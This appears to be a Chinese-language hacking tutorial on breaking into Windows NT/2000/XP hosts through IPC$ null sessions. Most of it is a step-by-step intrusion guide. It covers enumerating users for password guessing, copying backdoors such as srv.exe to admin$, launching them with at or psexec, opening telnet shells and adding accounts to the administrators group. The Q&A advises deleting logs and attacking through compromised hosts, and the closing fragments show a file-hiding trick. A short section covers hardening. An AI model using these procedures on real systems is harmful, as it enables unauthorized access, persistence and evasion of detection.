对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。
从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令：

1 首先，我们先建立一个空连接（当然，这需要目标开放ipc$）
命令：net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。

2 查看远程主机的共享资源
命令：net view \\ip
解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。

在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看远程主机的当前时间
命令： net time \\ip
解释：用此命令可以得到一个远程主机的当前时间。

4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）
命令：nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表，返回如下结果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在Event Log中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？

五 ipc$所使用的端口
首先我们来了解一些基础知识：
1 SMB:(Server Message Block) Windows协议族，用于文件打印共享的服务；
2 NBT:(NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：

对于win2000客户端（发起端）来说：
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。

对于win2000服务器端来说：
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放（LISTENING）；
2 如果禁止NBT，那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。

六 ipc管道在hack攻击中的意义
ipc管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放ipc管道的主机似乎更容易得手。通过ipc管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。如果不考虑这些，仅从传送文件这一方面，ipc管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然，我们也不能忽视权限在ipc管道中扮演的重要角色，想必你一定品尝过空会话的尴尬，没有权限，开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限，那么ipc管道这把双刃剑将显示出它狰狞的一面。

七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因：

1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；

2 如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接；

3 连接发起方未启动Lanmanworkstation服务（显示名为：Workstation）：它提供网络链结和通讯，没有它发起方无法发起连接请求；

4 响应方未启动Lanmanserver服务（显示名为：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接；

5 响应方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份（不过这种情况好像不多）；

6 响应方的139，445端口未处于监听状态或被防火墙屏蔽；

7 连接发起方未打开139，445端口；

8 用户名或者密码错误：如果发生这样的错误，系统将给你类似于'无法更新密码'这样的错误提示（显然空会话排除这种错误）；

9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；

10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问：很可能你使用的用户不是管理员权限的；
错误号51，Windows无法找到网络路径：网络有问题；
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；
错误号1326，未知的用户名或错误密码：原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；
错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。

八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？

1 对方未开启共享文件夹
这类错误出现的最多，占到50%以上。许多朋友在ipc$连接建立成功后，甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在（用软件查看当然更好），不要认为能建立ipc$连接就一定有共享文件夹存在。

2 向默认共享复制失败
这类错误也是大家经常犯的，主要有两个小方面：

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，并不能说明默认共享一定存在。ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享却是实实在在的共享文件夹；

2）由于net view \\IP 这个命令无法显示默认共享文件夹（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生）

要点：请大家一定区分ipc共享，默认共享，普通共享这三者的区别：ipc共享是一个管道，并不是实际的共享文件夹；默认共享是安装时默认打开的文件夹；普通共享是我们自己开启的可以设置权限的共享文件夹。

3用户权限不够，包括四种情形：
1）空连接向所有共享（默认共享和普通共享）复制时，权限是不够的；
2）向默认共享复制时，在Win2000 Pro版中，只有Administrators和Backup Operators组成员才可以，在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录；
3）向普通共享复制时，要具有相应权限（即对方管理员事先设定的访问权限）；
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；

注意：
1 不要认为administrator就一定具有管理员权限，管理员名称是可以改的
2 管理员可以访问默认共享的文件夹，但不一定能够访问普通的共享文件夹，因为管理员可以对普通的共享文件夹进行访问权限设置，如图6，管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问，那么此时即使你拥有管理员权限，你仍然不能访问D盘。不过有意思的是，如果此时对方又开启了D$的默认共享，那么你却可以访问D$，从而绕过了权限限制，有兴趣的朋友可以自己做测试。

4被防火墙杀死或在局域网
还有一种情况，那就是也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；或者你把木马复制到了局域网内的主机，导致连接失败（反向连接的木马不会发生这种情况）。如果你没有想到这种情况，你会以为是复制上出了问题，但实际你的复制操作已经成功了，只是运行时出了问题。

呵呵，大家也知道，ipc$连接在实际操作过程中会出现各种各样的问题，上面我所总结的只是一些常见错误，没说到的，大家可以给我提个醒儿。

九 关于at命令和xp对ipc$的限制
本来还想说一下用at远程运行程序失败的原因，但考虑到at的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用psexec.exe远程运行程序，假设想要远程机器执行本地c:\xinxin.exe文件，且管理员为administrator，密码为1234，那么输入下面的命令：
psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已经建立ipc连接，则-u -p这两个参数不需要，psexec.exe将自动拷贝文件到远程机器并运行。

本来xp中的ipc$也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到xp的时候，大部分操作都很难成功。我在这里就简单提一下吧，在xp的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和密码，你所得到的权限也只是Guest，因此大部分操作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码，我建议你尽量避开ipc管道。

十 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell，比如telnet，木马，cmd重定向等，然后在shell下执行：
net share ipc$
开放目标的ipc$共享；
net share ipc$ /del
关闭目标的ipc$共享；如果你要给它开共享文件夹，你可以用：
net share xinxin=c:\
这样就把它的c盘开为共享名为xinxin共享文件夹了。（可是我发现很多人错误的认为开共享文件夹的命令是net share c$，还大模大样的给菜鸟指指点点，真是误人子弟了）。再次声明，这些操作都是在shell下才能实现的。

十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成；

2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成；

3 运行/关闭远程主机的服务，需要在shell下完成；

4 启动/杀掉远程主机的进程，也需要在shell下完成（用软件的情况下除外，如pskill）。

十二 入侵中可能会用到的命令
为了这份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的shell（如cmd，telnet等）后，才能向远程主机执行。

1 建立/删除ipc$连接的命令

1）建立空连接:
net use \\127.0.0.1\ipc$ "" /user:""

2）建立非空连接:
net use \\127.0.0.1\ipc$ "密码" /user:"用户名"

3）删除连接:
net use \\127.0.0.1\ipc$ /del

2 在ipc$连接中对远程主机的操作命令

1） 查看远程主机的共享资源（看不到默认共享）:
net view \\127.0.0.1

2） 查看远程主机的当前时间:
net time \\127.0.0.1

3） 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1

4）映射/删除远程共享:
net use z: \\127.0.0.1\c
此命令将共享名为c的共享资源映射为本地z盘

net use z: /del
删除映射的z盘，其他盘类推

5）向远程主机复制文件:
copy 路径\文件名 \\IP\共享目录名，如：
copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然，你也可以把远程主机上的文件复制到自己的机器里：
copy \\127.0.0.1\c$\xinxin.exe c:\

6）远程添加计划任务:
at \\IP 时间 程序名 如：
at \\127.0.0.0 11:00 xinxin.exe
注意：时间尽量使用24小时制；如果你打算运行的程序在系统默认搜索路径（比如system32/）下则不用加路径，否则必须加全路径

3 本地命令

1）查看本地主机的共享资源（可以看到本地的默认共享）
net share

2）得到本地主机的用户列表
net user

3）显示本地某用户的帐户信息
net user 帐户名

4）显示本地主机当前启动的服务
net start

5）启动/关闭本地服务
net start 服务名
net stop 服务名

6）在本地添加帐户
net user 帐户名 密码 /add

7）激活禁用的用户
net uesr 帐户名 /active:yes

8）加入管理员组
net localgroup administrators 帐户名 /add

很显然的是，虽然这些都是本地命令，但如果你在远程主机的shell中输入，比如你telnet成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。

4 其他一些命令
1）telnet
telnet IP 端口
telnet 127.0.0.0 23

2）用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求：
1）目标开启了ipc$共享
2）你要拥有管理员密码和帐号
3）目标开启RemoteRegistry服务，用户就可以更改ntlm认证
4）对仅WIN2K/XP有效

3）用psexec.exe一步获得shell，需要ipc管道支持
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd

十三 对比过去和现今的ipc$入侵
既然是对比，那么我就先把过去的ipc$入侵步骤写给大家，都是蛮经典的步骤：

[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\用扫到的空口令建立连接　　

[2]
c:\>net view \\127.0.0.1
\\查看远程的共享资源

[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\将一次性后门srv.exe复制到对方的系统文件夹下，前提是admin$开启　　

[4]
C:\>net time \\127.0.0.1
\\查看远程主机的当前时间

[5]
C:\>at \\127.0.0.1 时间 srv.exe
\\用at命令远程运行srv.exe，需要对方开启了'Task Scheduler'服务　　

[6]
C:\>net time \\127.0.0.1
\\再次查看当前时间来估算srv.exe是否已经运行，此步可以省略

[7]　　　　
C:\>telnet 127.0.0.1 99
\\开一个新窗口，用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思？那你就把它想象成远程机器的控制权就好了，操作像DOS)，99端口是srv.exe开的一次性后门的端口　　

[8]
C:\WINNT\system32>net start telnet
\\我们在刚刚登陆上的shell中启动远程机器的telnet服务，毕竟srv.exe是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的telnet已经启动，此步可省略

[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\在原来那个窗口中将ntlm.exe传过去，ntlm.exe是用来更改telnet身份验证的　　

[10]
C:\WINNT\system32>ntlm.exe
\\在shell窗口中运行ntlm.exe，以后你就可以畅通无阻的telnet这台主机了
　　
[11]
C:\>telnet 127.0.0.1 23
\\在新窗口中telnet到127.0.0.1，端口23可省略，这样我们又获得一个长期的后门

[12]
C:\WINNT\system32>net user 帐户名 密码 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帐户名 /add
\\telnet上以后，你可以建立新帐户，激活guest，把任何帐户加入管理员组等

好了，写到这里我似乎回到了2，3年前，那时的ipc$大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的ipc$入侵吧。

[1]
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
\\用这个工具我们可以一步到位的获得shell

OpenTelnet.exe \\server 管理员帐号 密码 NTLM的认证方式 port
\\用它可以方便的更改telnet的验证方式和端口，方便我们登陆

[2]
已经没有第二步了，用一步获得shell之后，你做什么都可以了，安后门可以用winshell，克隆就用ca吧，开终端用3389.vbe，记录密码用win2kpass，总之好的工具不少，随你选了，我就不多说了。

十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1
如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但无法通过这种连接得到列举SAM帐号和共享信息的权限；在Windows 2000 中增加了"2"，未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－'对匿名连接的额外限制'

2 禁止默认共享

1）察看本地共享资源
运行-cmd-输入net share

2）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务
net stop server /y （重新启动后server服务会重新开启）

4）禁止自动打开默认共享（此操作并不能关闭ipc$共享）
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。

3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享，那就禁止server服务吧：
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用，这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于server服务，不要管它。

4 屏蔽139，445端口
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。

1）139端口可以通过禁止NBT来屏蔽
本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项

2）445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。

3）安装防火墙进行端口过滤

6 设置复杂密码，防止通过ipc$穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。

十五 ipc$入侵问答精选
1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？

答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。

2.你看下面的情况是为什么，可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功

答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。

3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？

答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。

4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？

答：首先纠正你的一个错误，用net view \\ip是无法看到默认共享的，你可以试着将文件复制到c$，d$看看，如果都不行，说明他关闭了默认共享，那你就用opentelnet.exe或psexec.exe吧，用法上面有。

5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add

答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell，只有在获得一个shell（比如telnet）之后，你才能在远程机器建立一个帐户，否则你的操作只是在本地进行。

6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？

答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。

7.我用Win98能与对方建立ipc$连接吗？

答：理论上不可以，要进行ipc$的操作，建议用win2000，用其他操作系统会带来许多不必要的麻烦。

8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？

答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的NBT没有打开，netstat命令是建立在NBT之上的。　　

9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？

答：呵呵，这说明你已经与目标主机建立了ipc$连接，两个主机间同时建立两个ipc$连接是不允许的。

10.我在映射的时候出现：
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？

答：你也太粗心了吧，这说明你有一个h盘了，映射到没有的盘符吧！

11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。

答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。

12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？

答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.

13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？

答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。

14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？

答：虽然你具有管理员权限，但管理员在设置c盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许administrator访问，所以会出现上述问题。

15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器？如果禁止server服务呢？

答：禁止以上两项仍可以发起ipc$连接，不过这种问题自己动手试验会更好。

16.能告诉我下面的两个错误产生的原因吗？
c:\>net time \\61.225.*.*
系统发生 5 错误。
拒绝访问。

c:\>net view \\61.225.*.*
系统发生 5 错误。
拒绝访问。

答：起初遇到这个问题的时候我也很纳闷，错误5表示权限不够，可是连空会话的权限都可以完成上面的两个命令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了ipc$连接，之后他又输入了上面那两个命令，随之发生了错误5。

17.您看看这是怎么回事？
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。

答：答案很简单，你的命令错了，应该是net time \\ip
没输入ip地址，当然找不到服务器。view的命令也应该有ip地址，即：net view \\ip

G:\>copy a key..\
已复制         1 个文件。

G:\>del a（删除a文件，这样看不到，搜索也找不到）

G:\>type key..\a（可以这样查看a的内容，）

G:\>copy key..\a g:(或者复制出来)

这样可以隐藏文件，别人看不到也删不掉，除非用rmdir key..\ /s删除.

D:\Documents and Settings\Administrator>net localgroup administrators a /add
命令成功完成。